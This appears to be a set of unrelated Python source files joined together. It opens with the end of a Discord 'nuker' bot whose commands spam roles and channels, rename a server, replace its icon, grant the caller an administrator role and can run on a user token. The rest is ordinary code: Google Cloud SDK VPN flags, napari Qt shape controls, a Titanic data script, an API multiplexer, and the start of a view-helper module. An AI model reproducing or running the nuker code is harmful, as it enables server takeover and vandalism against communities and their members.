try:
await ctx.guild.create_text_channel(name=name)
print(f"{msgs['+']} Created channel")
except:
print(f"{msgs['error']} Can't create channel")
@bot.command(name="11", aliases=["sr"])
@commands.check(isWhitelisted)
async def spamWithRoles(ctx, amount: int = 25, *, name="Untitled Nuker"):
await msg_delete(ctx)
for i in range(amount):
try:
await ctx.guild.create_role(name=name)
print(f"{msgs['+']} Created role")
except:
print(f"{msgs['error']} Can't create role")
@bot.command(name='12', aliases=["si"])
@commands.check(isWhitelisted)
async def editServerIcon(ctx):
await msg_delete(ctx)
if ctx.message.attachments:
icon = await ctx.message.attachments[0].read()
else:
return
try:
await ctx.guild.edit(icon=icon)
print(f"{msgs['+']} Changed server icon")
except:
print(f"{msgs['error']} Can't change server icon")
@bot.command(name='13', aliases=["sn"])
@commands.check(isWhitelisted)
async def editServerName(ctx, *, name="Untitled Nuker"):
await msg_delete(ctx)
try:
await ctx.guild.edit(name=name)
print(f"{msgs['+']} Changed server name")
except:
print(f"{msgs['error']} Can't change server name")
@bot.command(name="14", aliases=["ga"])
@commands.check(isWhitelisted)
async def getAdmin(ctx, *, rolename="Untitled Nuker"):
await msg_delete(ctx)
try:
perms = discord.Permissions(administrator=True)
role = await ctx.guild.create_role(name=rolename, permissions=perms)
await ctx.message.author.add_roles(role)
print(f"{msgs['+']} Added admin role to {ctx.message.author}")
except:
print(f"{msgs['error']} Can't add admin role to {ctx.message.author}")
@bot.command(name='15', aliases=["rg"])
@commands.check(isWhitelisted)
@commands.dm_only()
async def reviveGuild(ctx, guildId: int = None):
if guildId:
guild = bot.get_guild(guildId)
try:
await guild.create_text_channel(name="Untitled Nuker")
print(f"{msgs['+']} Revived {guild}")
except:
print(f"{msgs['error']} Can't revive {guild}")
"""
Running bot
"""
try:
bot.run(token, bot=not userOrBot())
except discord.errors.LoginFailure:
print(f'{msgs["error"]} Invalid Token')
print(msgs['pressenter'])
input()
os._exit(0)
except discord.errors.PrivilegedIntentsRequired:
print(f"{msgs['error']} It looks like you didn't enable the necessary intents in the developer portal."
f"Visit {colors['main']}https://discord.com/developers/applications/ {colors['white']}and turn them on.\n")
print(msgs['pressenter'])
input()
os._exit(0)
except Exception as e:
print(f'{colors["red"]}\nAn error occured while logging:\n{"".join(traceback.format_exception(type(e), e, e.__traceback__))}{colors["white"]}\n')
print(msgs['pressenter'])
input()
os._exit(0)
|
<filename>lib/googlecloudsdk/command_lib/compute/vpn_gateways/flags.py
# -*- coding: utf-8 -*- #
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Flags and helpers for the compute vpn-gateways commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.compute import completers as compute_completers
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.util.apis import arg_utils
# The default output format for the list sub-command.
DEFAULT_LIST_FORMAT = """\
table(
name,
vpnInterfaces[0].ipAddress:label=INTERFACE0,
vpnInterfaces[1].ipAddress:label=INTERFACE1,
network.basename(),
region.basename()
)"""
class VpnGatewaysCompleter(compute_completers.ListCommandCompleter):
"""A VPN gateway completer for a resource argument."""
def __init__(self, **kwargs):
super(VpnGatewaysCompleter, self).__init__(
collection='compute.vpnGateways',
list_command='alpha compute vpn-gateways list --uri',
**kwargs)
def GetVpnGatewayArgument(required=True, plural=False):
"""Returns the resource argument object for the VPN gateway flag."""
return compute_flags.ResourceArgument(
resource_name='VPN Gateway',
completer=VpnGatewaysCompleter,
plural=plural,
custom_plural='VPN Gateways',
required=required,
regional_collection='compute.vpnGateways',
region_explanation=compute_flags.REGION_PROPERTY_EXPLANATION)
def GetVpnGatewayArgumentForOtherResource(required=False):
"""Returns the flag for specifying the VPN gateway."""
return compute_flags.ResourceArgument(
name='--vpn-gateway',
resource_name='VPN Gateway',
completer=VpnGatewaysCompleter,
plural=False,
required=required,
regional_collection='compute.vpnGateways',
short_help=('Reference to a VPN gateway, this flag is used for creating '
'HA VPN tunnels.'),
region_explanation=('Should be the same as region, if not specified, '
'it will be automatically set.'),
detailed_help="""\
Reference to a Highly Available VPN gateway.
""")
def GetPeerVpnGatewayArgumentForOtherResource(required=False):
"""Returns the flag for specifying the peer VPN gateway."""
return compute_flags.ResourceArgument(
name='--peer-gcp-gateway',
resource_name='VPN Gateway',
completer=VpnGatewaysCompleter,
plural=False,
required=required,
regional_collection='compute.vpnGateways',
short_help=(
'Peer side Highly Available VPN gateway representing the remote '
'tunnel endpoint, this flag is used when creating HA VPN tunnels '
'from Google Cloud to Google Cloud.'
'Either --peer-external-gateway or --peer-gcp-gateway must be specified when '
'creating VPN tunnels from High Available VPN gateway.'),
region_explanation=('Should be the same as region, if not specified, '
'it will be automatically set.'),
detailed_help="""\
Reference to the peer side Highly Available VPN gateway.
""")
def GetDescriptionFlag():
"""Returns the flag for VPN gateway description."""
return base.Argument(
'--description',
help='An optional, textual description for the VPN gateway.')
def GetInterconnectAttachmentsFlag():
"""Returns the flag for interconnect attachments (VLAN attachments) associated with a VPN gateway."""
return base.Argument(
'--interconnect-attachments',
type=arg_parsers.ArgList(max_length=2),
hidden=True,
required=False,
metavar='INTERCONNECT_ATTACHMENTS',
help="""\
Names of interconnect attachments (VLAN attachments) associated with the
VPN gateway interfaces. You must specify this field when using a VPN gateway
for IPsec-encrypted Cloud Interconnect. Otherwise, this field is optional.
For example,
`--interconnect-attachments attachment-a-zone1,attachment-a-zone2`
associates VPN gateway with attachment from zone1 on interface 0 and with
attachment from zone2 on interface 1.
""")
def GetInterconnectAttachmentRef(resources, name, region, project):
"""Generates an interconnect attachment reference from the specified name, region and project."""
return resources.Parse(
name,
collection='compute.interconnectAttachments',
params={
'project': project,
'region': region
})
def GetStackType():
"""Returns the flag for VPN gateway stack type.
Return:
An enum presents the stack type for the VPN gateway.
"""
return base.Argument(
'--stack-type',
choices={
'IPV4_ONLY':
'Only IPv4 protocol is enabled on this vpn gateway.',
'IPV4_IPV6':
'Both IPv4 and IPv6 protocols are enabled on this vpn gateway.',
},
type=arg_utils.ChoiceToEnumName,
help="""\
The stack type of the protocol(s) enabled on this vpn gateway.
If not provided, `IPV4_ONLY` will be used.
""")
|
from collections import Iterable
import numpy as np
from qtpy.QtCore import Qt
from qtpy.QtWidgets import (
QButtonGroup,
QVBoxLayout,
QRadioButton,
QPushButton,
QLabel,
QComboBox,
QSlider,
)
from .qt_base_layer import QtLayerControls, QtLayerProperties
from ..layers.shapes._constants import Mode
class QtShapesControls(QtLayerControls):
def __init__(self, layer):
super().__init__(layer)
self.layer.events.mode.connect(self.set_mode)
self.select_button = QtModeButton(
layer, 'select', Mode.SELECT, 'Select mode'
)
self.direct_button = QtModeButton(
layer, 'direct', Mode.DIRECT, 'Direct select mode'
)
self.panzoom_button = QtModeButton(
layer, 'zoom', Mode.PAN_ZOOM, 'Pan/zoom mode'
)
self.rectangle_button = QtModeButton(
layer, 'rectangle', Mode.ADD_RECTANGLE, 'Add rectangles'
)
self.ellipse_button = QtModeButton(
layer, 'ellipse', Mode.ADD_ELLIPSE, 'Add ellipses'
)
self.line_button = QtModeButton(
layer, 'line', Mode.ADD_LINE, 'Add lines'
)
self.path_button = QtModeButton(
layer, 'path', Mode.ADD_PATH, 'Add paths'
)
self.polygon_button = QtModeButton(
layer, 'polygon', Mode.ADD_POLYGON, 'Add polygons'
)
self.vertex_insert_button = QtModeButton(
layer, 'vertex_insert', Mode.VERTEX_INSERT, 'Insert vertex'
)
self.vertex_remove_button = QtModeButton(
layer, 'vertex_remove', Mode.VERTEX_REMOVE, 'Remove vertex'
)
self.move_front_button = QtMoveFrontButton(layer)
self.move_back_button = QtMoveBackButton(layer)
self.delete_button = QtDeleteShapeButton(layer)
self.button_group = QButtonGroup(self)
self.button_group.addButton(self.select_button)
self.button_group.addButton(self.direct_button)
self.button_group.addButton(self.panzoom_button)
self.button_group.addButton(self.rectangle_button)
self.button_group.addButton(self.ellipse_button)
self.button_group.addButton(self.line_button)
self.button_group.addButton(self.path_button)
self.button_group.addButton(self.polygon_button)
self.button_group.addButton(self.vertex_insert_button)
self.button_group.addButton(self.vertex_remove_button)
layout = QVBoxLayout()
layout.setContentsMargins(12, 20, 10, 10)
layout.addWidget(self.panzoom_button)
layout.addWidget(self.select_button)
layout.addWidget(self.direct_button)
layout.addWidget(self.vertex_insert_button)
layout.addWidget(self.vertex_remove_button)
layout.addWidget(self.rectangle_button)
layout.addWidget(self.ellipse_button)
layout.addWidget(self.line_button)
layout.addWidget(self.path_button)
layout.addWidget(self.polygon_button)
layout.addWidget(self.move_front_button)
layout.addWidget(self.move_back_button)
layout.addWidget(self.delete_button)
layout.addStretch(0)
self.setLayout(layout)
self.setMouseTracking(True)
self.panzoom_button.setChecked(True)
def mouseMoveEvent(self, event):
self.layer.status = str(self.layer.mode)
def set_mode(self, event):
mode = event.mode
if mode == Mode.SELECT:
self.select_button.setChecked(True)
elif mode == Mode.DIRECT:
self.direct_button.setChecked(True)
elif mode == Mode.PAN_ZOOM:
self.panzoom_button.setChecked(True)
elif mode == Mode.ADD_RECTANGLE:
self.rectangle_button.setChecked(True)
elif mode == Mode.ADD_ELLIPSE:
self.ellipse_button.setChecked(True)
elif mode == Mode.ADD_LINE:
self.line_button.setChecked(True)
elif mode == Mode.ADD_PATH:
self.path_button.setChecked(True)
elif mode == Mode.ADD_POLYGON:
self.polygon_button.setChecked(True)
elif mode == Mode.VERTEX_INSERT:
self.vertex_insert_button.setChecked(True)
elif mode == Mode.VERTEX_REMOVE:
self.vertex_remove_button.setChecked(True)
else:
raise ValueError("Mode not recongnized")
class QtModeButton(QRadioButton):
def __init__(self, layer, button_name, mode, tool_tip):
super().__init__()
self.mode = mode
self.layer = layer
self.setToolTip(tool_tip)
self.setChecked(False)
self.setProperty('mode', button_name)
self.toggled.connect(lambda state=self: self._set_mode(state))
self.setFixedWidth(28)
def _set_mode(self, bool):
with self.layer.events.mode.blocker(self._set_mode):
if bool:
self.layer.mode = self.mode
class QtDeleteShapeButton(QPushButton):
def __init__(self, layer):
super().__init__()
self.layer = layer
self.setFixedWidth(28)
self.setFixedHeight(28)
self.setToolTip('Delete selected')
self.clicked.connect(self.layer.remove_selected)
class QtMoveBackButton(QPushButton):
def __init__(self, layer):
super().__init__()
self.layer = layer
self.setFixedWidth(28)
self.setFixedHeight(28)
self.setToolTip('Move to back')
self.clicked.connect(self.layer.move_to_back)
class QtMoveFrontButton(QPushButton):
def __init__(self, layer):
super().__init__()
self.layer = layer
self.setFixedWidth(28)
self.setFixedHeight(28)
self.setToolTip('Move to front')
self.clicked.connect(self.layer.move_to_front)
class QtShapesProperties(QtLayerProperties):
def __init__(self, layer):
super().__init__(layer)
self.layer.events.edge_width.connect(self._on_edge_width_change)
self.layer.events.edge_color.connect(self._on_edge_color_change)
self.layer.events.face_color.connect(self._on_face_color_change)
sld = QSlider(Qt.Horizontal, self)
sld.setFocusPolicy(Qt.NoFocus)
sld.setFixedWidth(75)
sld.setMinimum(0)
sld.setMaximum(40)
sld.setSingleStep(1)
value = self.layer.edge_width
if isinstance(value, Iterable):
if isinstance(value, list):
value = np.asarray(value)
value = value.mean()
sld.setValue(int(value))
sld.valueChanged[int].connect(
lambda value=sld: self.changeWidth(value)
)
self.widthSlider = sld
row = self.grid_layout.rowCount()
self.grid_layout.addWidget(QLabel('width:'), row, self.name_column)
self.grid_layout.addWidget(sld, row, self.property_column)
face_comboBox = QComboBox()
colors = self.layer._colors
for c in colors:
face_comboBox.addItem(c)
index = face_comboBox.findText(
self.layer.face_color, Qt.MatchFixedString
)
if index >= 0:
face_comboBox.setCurrentIndex(index)
face_comboBox.activated[str].connect(
lambda text=face_comboBox: self.changeFaceColor(text)
)
self.faceComboBox = face_comboBox
row = self.grid_layout.rowCount()
self.grid_layout.addWidget(
QLabel('face_color:'), row, self.name_column
)
self.grid_layout.addWidget(face_comboBox, row, self.property_column)
edge_comboBox = QComboBox()
colors = self.layer._colors
for c in colors:
edge_comboBox.addItem(c)
index = edge_comboBox.findText(
self.layer.edge_color, Qt.MatchFixedString
)
if index >= 0:
edge_comboBox.setCurrentIndex(index)
edge_comboBox.activated[str].connect(
lambda text=edge_comboBox: self.changeEdgeColor(text)
)
self.edgeComboBox = edge_comboBox
row = self.grid_layout.rowCount()
self.grid_layout.addWidget(
QLabel('edge_color:'), row, self.name_column
)
self.grid_layout.addWidget(edge_comboBox, row, self.property_column)
self.setExpanded(False)
def changeFaceColor(self, text):
self.layer.face_color = text
def changeEdgeColor(self, text):
self.layer.edge_color = text
def changeWidth(self, value):
self.layer.edge_width = float(value) / 2
def _on_edge_width_change(self, event):
with self.layer.events.edge_width.blocker():
value = self.layer.edge_width
value = np.clip(int(2 * value), 0, 40)
self.widthSlider.setValue(value)
def _on_edge_color_change(self, event):
with self.layer.events.edge_color.blocker():
index = self.edgeComboBox.findText(
self.layer.edge_color, Qt.MatchFixedString
)
self.edgeComboBox.setCurrentIndex(index)
def _on_face_color_change(self, event):
with self.layer.events.face_color.blocker():
index = self.faceComboBox.findText(
self.layer.face_color, Qt.MatchFixedString
)
self.faceComboBox.setCurrentIndex(index)
|
import csv
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model, datasets
folder = "trained_data/"
filename = "train.csv"
gender_to_number = {
'male' : 0,
'female': 1
}
port_to_number = {
'' : 0,
'S': 0,
'C': 1,
'Q': 2
}
keys_to_remove = [
'Name',
'Fare',
'Ticket',
'PassengerId'
]
def normalize_data():
data = []
with open(folder + filename, 'rb') as csvfile:
spamreader = csv.DictReader(csvfile)
for row in spamreader:
for key in keys_to_remove:
del row[key]
row['Sex'] = gender_to_number[row['Sex']]
row['Embarked'] = port_to_number[row['Embarked']]
row['Age'] = 0 if row['Age'] == "" else float(row['Age'])
row['Parch'] = 0 if row['Parch'] == "" else int(row['Parch'])
row['Pclass'] = 3 if row['Pclass'] == "" else int(row['Pclass'])
row['Survived'] = int(row['Survived'])
row['SibSp'] = 0 if row['SibSp'] == "" else int(row['SibSp'])
row['Cabin'] = 0 if row['Cabin'] == "" else 1
data.append(row)
return data
def remove_data_keys(data):
data_matrix = []
for data_row in data:
row = []
for key in data_row:
# print key
row.append(data_row[key])
data_matrix.append(row)
return data_matrix
data = normalize_data()
matrix = remove_data_keys(data)
####################################################
iris = datasets.load_iris()
# X = iris.data[:, :2] # we only take the first two features.
# X = matrix[:, :8]
print iris.data
# print data
# print matrix
print type(data)
survived = [] # Y: List of 1's 0's
for row in matrix:
survived.append(row[5])
Y = survived
# # # import some data to play with
# # iris = datasets.load_iris()
# # X = iris.data[:, :2] # we only take the first two features.
# # X = matrix
# # # Y = iris.target
#
# h = .02 # step size in the mesh
#
# logreg = linear_model.LogisticRegression(C=1e5)
#
# # we create an instance of Neighbours Classifier and fit the data.
# logreg.fit(X, Y)
#
# # Plot the decision boundary. For that, we will assign a color to each
# # point in the mesh [x_min, m_max]x[y_min, y_max].
# x_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5
# y_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5
# xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
# Z = logreg.predict(np.c_[xx.ravel(), yy.ravel()])
#
# # Put the result into a color plot
# Z = Z.reshape(xx.shape)
# plt.figure(1, figsize=(4, 3))
# plt.pcolormesh(xx, yy, Z, cmap=plt.cm.Paired)
#
# # Plot also the training points
# plt.scatter(X[:, 0], X[:, 1], c=Y, edgecolors='k', cmap=plt.cm.Paired)
# plt.xlabel('Sepal length')
# plt.ylabel('Sepal width')
#
# plt.xlim(xx.min(), xx.max())
# plt.ylim(yy.min(), yy.max())
# plt.xticks(())
# plt.yticks(())
#
# plt.show()
|
from concurrent.futures import ThreadPoolExecutor
import numpy
import operator
import random
import sys
from threading import Thread, Lock
import time
from timeit import default_timer as timer
import traceback
from apimux.log import logger
from apimux.rwlock import ReadWriteLock
from apimux import config
class APIMultiplexer(object):
def __init__(self, api_list=[], config_filepath='config.ini'):
"""
Parameters
----------
api_list : list
List of objects that are implementing the default class
BaseThirdPartyAPIService.
"""
apimux_cfg = config.parse_config(config_filepath)
self.PERCENTILE = apimux_cfg.getint("PERCENTILE")
self.MAX_HISTORY_RTIME = apimux_cfg.getint("MAX_HISTORY_RTIME")
self.MAX_WAIT_TIME = apimux_cfg.getint("MAX_WAIT_TIME")
self._PERIODIC_CHECK_INTERVAL = apimux_cfg.getint("PERIODIC_CHECK")
logger.debug("Initializing the APIMultiplexer class")
# Locks used to prevent multi-threading issues
self._locks = {}
# ReadWriteLock allows multiple readers and only one writer
self._locks["_api_list"] = ReadWriteLock()
self._api_list = {}
self._locks["_api_response_times"] = Lock()
self._api_response_times = {}
self._locks["_percentile_map"] = Lock()
self._percentile_map = {}
self._futures_not_finished = {}
self._locks["_futures_not_finished"] = Lock()
# Registering all APIs passed as parameters
if len(api_list) > 0:
for x in api_list:
self.register_new_api(x)
self._ignore_slow_apis = apimux_cfg.getboolean("ignore_slow_apis")
self._slow_multiplied = apimux_cfg.getfloat("slow_multiplied")
self._exploration_coefficient = apimux_cfg.getint(
"exploration_coefficient")
# Whether it should enable round robing or not
self._round_robin = apimux_cfg.getboolean("round_robin")
if self._round_robin:
logger.info("Round robin enabled!")
# Disable exploration if round robin is enabled
self._exploration_coefficient = 0
elif self._exploration_coefficient > 0:
logger.info("Exploration with percentage %s enabled!"
% self._exploration_coefficient)
self._current_order = []
self._locks["_current_order"] = Lock()
if apimux_cfg.getboolean("enable_periodic_check"):
# Starting a background thread which will run periodically
# the 'check' method if implemented by the user for an API
self._periodic_check_thread = Thread(
target=self._periodic_check, args=())
self._periodic_check_thread.setDaemon(True)
self._periodic_check_thread.start()
@property
def _round_robin_list(self):
if self._current_order:
return self._current_order
with self._locks["_current_order"]:
with self._locks["_api_list"]:
self._current_order = [x for x in self._api_list]
return self._current_order
def _time_function(self, f, data):
"""
Helper to measure the response time of function f.
Parameters
----------
f : function
The function for which the response time will be measured.
data : object
The object which will be passed to the call to function f.
Returns
-------
tuple
Returns a tuple containing the result of the function f
and the time it took to retrieve the result.
"""
start = timer()
result = f(data)
end = timer()
elapsed_ms = (end - start) * 1000
return (result, elapsed_ms)
def _get_result(self, api, data):
"""
Gets the result from an API.
Notes
-----
Returns None if the api raises an exception.
Parameters
----------
api : BaseThirdPartyAPIService
The API object which implements the class BaseThirdPartyAPIService.
data : object
The object which will be sent to the method get_result of the
api parameter.
Returns
-------
object
The result of calling get_result of the api object.
"""
try:
result, response_time = self._time_function(api.get_result, data)
self._process_response_time_api(response_time, api)
return result
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.warning("API raised the exception: %s"
% traceback.format_exception(exc_type,
exc_value,
exc_traceback))
return None
def _shift_current_order_and_get_first(self):
"""
Updates the current order of API list used for round robin.
Returns
-------
BaseThirdPartyAPIService
Returns the first API after the list is shifted to the left with
one position.
"""
logger.debug("Current round robin order: %s" % self._round_robin_list)
first_apiname = self._round_robin_list.pop(0)
self._round_robin_list.append(first_apiname)
logger.debug("New round robin order: %s" % self._round_robin_list)
with self._locks["_api_list"]:
first_api = self._api_list.get(first_apiname)
return first_api
def _should_explore(self):
"""
Helper function to decide if the request should use round-robin.
Round-robin is used to explore other APIs instead of picking the
fastest API all the time. It is based on self._exploration_coefficient.
Notes
-----
Can be disabled if the value of exploration coefficient is set
to -1 in the config file.
Returns
-------
boolean
Returns true with self._exploration_coefficient chance, otherwise
false.
"""
chance = random.randint(1, 100)
if chance <= self._exploration_coefficient:
return True
return False
def _get_fastest_api(self, sp_list=[]):
"""
Returns the fastest API so far.
The result is based on the sp_list. If sp_list is empty list, it
will fetch the current order of APIs based on response time. This
will be used as a context for the subsequent calls to this function.
Notes
-----
Round robin mode doesn't require sp_list parameter.
Parameters
----------
sp_list : list
Previous list of API names sorted based on the percentile result.
It should be empty list if it's the first call.
It contains the sorted list with the response time of each API
with respect to the value set in the config file for PERCENTILE.
Returns
-------
tuple
Contains the API object and the list which needs to be passed to
the subsequent calls to this function.
"""
def get_exploratory_api_and_context():
logger.debug("This request will try to explore with round-robin")
new_api = self._shift_current_order_and_get_first()
logger.debug("Picking API %s" % new_api.name)
# Remove the API that was picked from the list of remainings APIs
new_sp_list = [x for x in sp_list if x[0] != new_api.name]
return new_api, new_sp_list
if self._round_robin:
return self._shift_current_order_and_get_first(), None
should_explore = self._should_explore()
if sp_list:
if should_explore:
return get_exploratory_api_and_context()
with self._locks["_api_list"]:
return self._api_list.get(sp_list.pop(0)[0]), sp_list
with self._locks["_percentile_map"]:
sp_list = sorted(self._percentile_map.items(),
key=operator.itemgetter(1))
if should_explore:
return get_exploratory_api_and_context()
logger.debug("Sorted by response time median: %s" % sp_list)
with self._locks["_api_list"]:
fastest_api = self._api_list.get(sp_list.pop(0)[0])
return fastest_api, sp_list
def _prepare_get_next_results(self, number_of_results, exclude_services):
max_number_of_results = len(self._api_list) - len(exclude_services)
if number_of_results == -1:
requested_results = max_number_of_results
else:
requested_results = min(number_of_results, max_number_of_results)
allowed_failed_futures = max_number_of_results - requested_results
executor = ThreadPoolExecutor(max_workers=requested_results)
return allowed_failed_futures, requested_results, executor
def get_next_results(self, data, number_of_results,
exclude_services=[], exclude_results=[]):
"""
Retrieve the next N results from the registered APIs.
This function retrieves the next "number_of_results" using the
list which contains the fastest APIs by average response time.
Notes
-----
If self.MAX_WAIT_TIME is greater than 0, this method will try
to return within the specified time as long as there is at least
one result to return. If the running time passes the specified
time it will still wait for at least one result from the APIs.
If self.MAX_WAIT_TIME is 0, this method will wait as long as it's
needed to fetch the required number of results.
Parameters
----------
data : dict
Contains specific implementation of the objects that implement
BaseThirdPartyAPIService class.
number_of_results : int
Number of results that will be fetched. Pass -1 if you wish to
retrieve the results from all registered APIs. If the number
passed is greater than the number of registered APIs, it will
work in the same way as passing -1.
exclude_services : list of strings
List of strings containing the service names which should be
excluded for processing the request. It will be used to filter
the APIs from the list of fastest APIs.
exclude_results : list
List of results used to filter out the returned results. It is
particulary useful on the subsequent calls to get_next_results
when you want to exclude the results received from previous
requests.
Returns
-------
list of tuples
Returns a list of tuples containing the API name and the result
fetched from that API using the method get_result from
BaseThirdPartyAPIService. The type of the result it's specific
to the implementation of the developer for the function get_result.
"""
results = []
sp_list = []
future_to_api = {}
failed_futures = 0
failed_futures_lock = Lock()
allowed_failed_futures, requested_results, executor = (
self._prepare_get_next_results(number_of_results,
exclude_services))
def register_result(future):
# Appends the result from the future to the final list that will
# be returned
# The future is ignored if it was cancelled.
if not future.cancelled():
nonlocal failed_futures
nonlocal results
future_exception = future.exception()
if future_exception:
with failed_futures_lock:
failed_futures += 1
logger.warning("API %s raised exception %s" % (
future_to_api[future]['name'], future_exception))
elif future.result() is not None:
results.append((future_to_api[future]['name'],
future.result()))
else:
# The API returned an invalid result, mark the future
# as failed and continue fetching from the next one.
with failed_futures_lock:
failed_futures += 1
# Remove the future from the map
future_to_api.pop(future, None)
def launch_future(api, data, executor):
future = executor.submit(self._get_result, api, data)
future_to_api[future] = {"name": api.name,
"start_time_ms": timer()}
future.add_done_callback(register_result)
def replace_failed_future(sp_list, data, exclude_services, executor,
elapsed_ms=None):
"""
Helper that replaces failed futures with new ones.
This function is used when any of the current API requests fail
and the number of results requested cannot be met. It launches
a new future requesting a result from another API to make sure
it meets the number of results desired.
Notes
-----
The parameter elapsed_ms is required only if
self.MAX_WAIT_TIME > 0.
Parameters
----------
sp_list : list of APIs
The list returned by self._get_fastest_api
data : object
The object which will be sent to the method get_result of the
api parameter.
exclude_services : list of strings
The API names which should be excluded from the result.
executor : ThreadPoolExecutor
The ThreadPoolExecutor object that will process the future.
elapsed_ms : int
How much time has elapsed since it started sending requests.
Returns
-------
object
The result of calling get_result of the api object.
"""
nonlocal failed_futures
nonlocal allowed_failed_futures
with failed_futures_lock:
if (allowed_failed_futures > 0 and
failed_futures > 0 and sp_list):
api, sp_list = self._get_fastest_api(sp_list=sp_list)
if api.name in exclude_services:
return
max_timeout = self._get_max_api_timeout(api.name)
if elapsed_ms:
if not (elapsed_ms + max_timeout) < self.MAX_WAIT_TIME:
# Too late to launch new futures
allowed_failed_futures = 0
launch_future(api, data, executor)
failed_futures -= 1
allowed_failed_futures -= 1
def cancel_slow_apis():
# Cancels the requests currently in progress if the elapsed time
# so far is greater than the average response time of
# self.PERCENTILE percentage of requests plus delta
# self._slow_multiplied.
nonlocal failed_futures
for future in future_to_api.keys():
api_details = future_to_api[future]
elapsed_ms = api_details['start_time_ms'] - timer()
if elapsed_ms > self._get_max_api_timeout(api_details['name']):
with failed_futures_lock:
failed_futures += 1
future.cancel()
try:
current_requests_sent = 0
while True:
api, sp_list = self._get_fastest_api(sp_list=sp_list)
if api.name in exclude_services:
continue
logger.debug("Launching future: %s" % api)
launch_future(api, data, executor)
current_requests_sent += 1
if current_requests_sent == requested_results:
break
if self.MAX_WAIT_TIME > 0:
start_time = timer()
while len(results) < requested_results:
elapsed_ms = (timer() - start_time) * 1000
if (elapsed_ms > self.MAX_WAIT_TIME and
len(results) > 0) or allowed_failed_futures == 0:
break
# Launch a new future if we have any failed futures.
replace_failed_future(
sp_list, data, exclude_services, executor, elapsed_ms)
# Cancel slow APIs
cancel_slow_apis()
time.sleep(0.01)
# Maximum wait time has passed here, cancel all futures and
# return as soon as possible
for future in future_to_api.keys():
future.cancel()
else:
while len(results) < requested_results:
# Launch a new future if we have any failed futures.
replace_failed_future(
sp_list, data, exclude_services, executor)
if len(sp_list) == 0:
break
time.sleep(0.01)
finally:
# When self.MAX_WAIT_TIME > 0 all futures will be already done
# executing or cancelled here which allows the executor to free
# the resources immediately.
# When self.MAX_WAIT_TIME == 0 the executor will wait as long as
# it's required for the futures to respond.
executor.shutdown(wait=True)
return results
def _get_max_api_timeout(self, apiname):
"""
Returns the maximum expected response time for an API.
The maximum expected response time for an API is computed using
the percentile defined by the user multiplied with some configurable
delta.
Parameters
----------
apiname : string
The name of the API.
Returns
-------
int
The maximum expected response time including the additional delta.
"""
with self._locks["_percentile_map"]:
timeout_result = self._percentile_map.get(apiname, None)
return timeout_result * self._slow_multiplied
def register_new_api(self, api):
"""
Registers new API and adds it to the internal list.
Parameters
----------
api : object
The object implementing BaseThirdPartyAPIService class.
"""
logger.info("New API to register: %s" % api.name)
self._locks["_api_list"].acquire_write()
if self._api_list.get(api.name, None) is not None:
raise Exception("API already exists in the list")
self._api_list[api.name] = api
self._locks["_api_list"].release_write()
# All APIs start from 0 initially, this will be automatically
# reconfigured based on the performance of the APIs.
with self._locks["_api_response_times"]:
self._api_response_times[api.name] = []
with self._locks["_percentile_map"]:
self._percentile_map[api.name] = 0
logger.info("New list: %s" % self._api_list.keys())
def remove_api(self, api):
"""
Removes the API from the internal list.
Parameters
----------
api : object
The object implementing BaseThirdPartyAPIService class.
"""
logger.info("Removing API: %s" % api.name)
self._locks["_api_list"].acquire_write()
removed_api = self._api_list.pop(api.name, None)
self._locks["_api_list"].release_write()
if removed_api is not None:
logger.debug("Removed API")
else:
logger.debug("Tried to remove API which is "
"not present in the list")
return
with self._locks["_api_response_times"]:
self._api_response_times.pop(api.name, None)
with self._locks["_percentile_map"]:
self._percentile_map.pop(api.name, None)
logger.info("New list: %s" % self._api_list.keys())
def _process_response_time_api(self, response_time, api):
"""
Analyses the response time of an API.
This function is always called on the response time of an API in
order to update the internal state with the average response time.
Parameters
----------
response_time : float
Elapsed time in milliseconds.
api : object
The API which had the response time passed above.
"""
logger.info("%s: response time %sms" % (api.name, response_time))
with self._locks["_api_response_times"]:
if (len(self._api_response_times[api.name]) >
self.MAX_HISTORY_RTIME):
# Remove from the history once it reaches max limit
self._api_response_times[api.name].pop(0)
self._api_response_times[api.name] += [response_time]
# Sorted returns a new cloned list
np_array = numpy.array(sorted(self._api_response_times[api.name]))
# Compute the response time of self.PERCENTILE percentage of requests
p = numpy.percentile(np_array, self.PERCENTILE)
with self._locks["_percentile_map"]:
self._percentile_map[api.name] = p
logger.debug("%s - %s percentile result: %s"
% (api.name, self.PERCENTILE, p))
def _periodic_check(self):
"""
Periodic check for the health and performance of the APIs.
This runs in a background thread to check the health and performance
of the third party APIs. It is useful in situations where there is
not enough traffic all the time required to have an up to date list
of response times.
"""
while True:
logger.debug("Starting periodic priority check")
with self._locks["_api_list"]:
logger.debug("API list: %s" % self._api_list.keys())
for key in self._api_list:
api = self._api_list.get(key)
logger.debug("Performing priority check on API: %s"
% api.name)
try:
response_time = api.check()
self._process_response_time_api(response_time, api)
except NotImplementedError:
# Ignore NotImplementedError, the user has decided
# to not implement the periodic check for the
# response time of this API
logger.debug("API %s has no priority check method "
"implemented." % api.name)
logger.debug("End of periodic priority check")
time.sleep(self._PERIODIC_CHECK_INTERVAL)
|
<filename>skbl/computeviews.py
"""Define helper functions used to compute the different views."""
import json
import os.path
import smtplib
import urllib.parse
from collections import defaultdict
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from hashlib import md5
from urllib.request import urlopen
from flask import current_app, g, render_template, request
from flask_babel import gettext
from . import helpers, static_info
def getcache(page, lang, usecache):
"""
Get cached page.
Check if the requested page, in language 'lang', is in the cache
If not, use the backup cache.
If the cache should not be used, return None
"""
# Compute the language
if not lang:
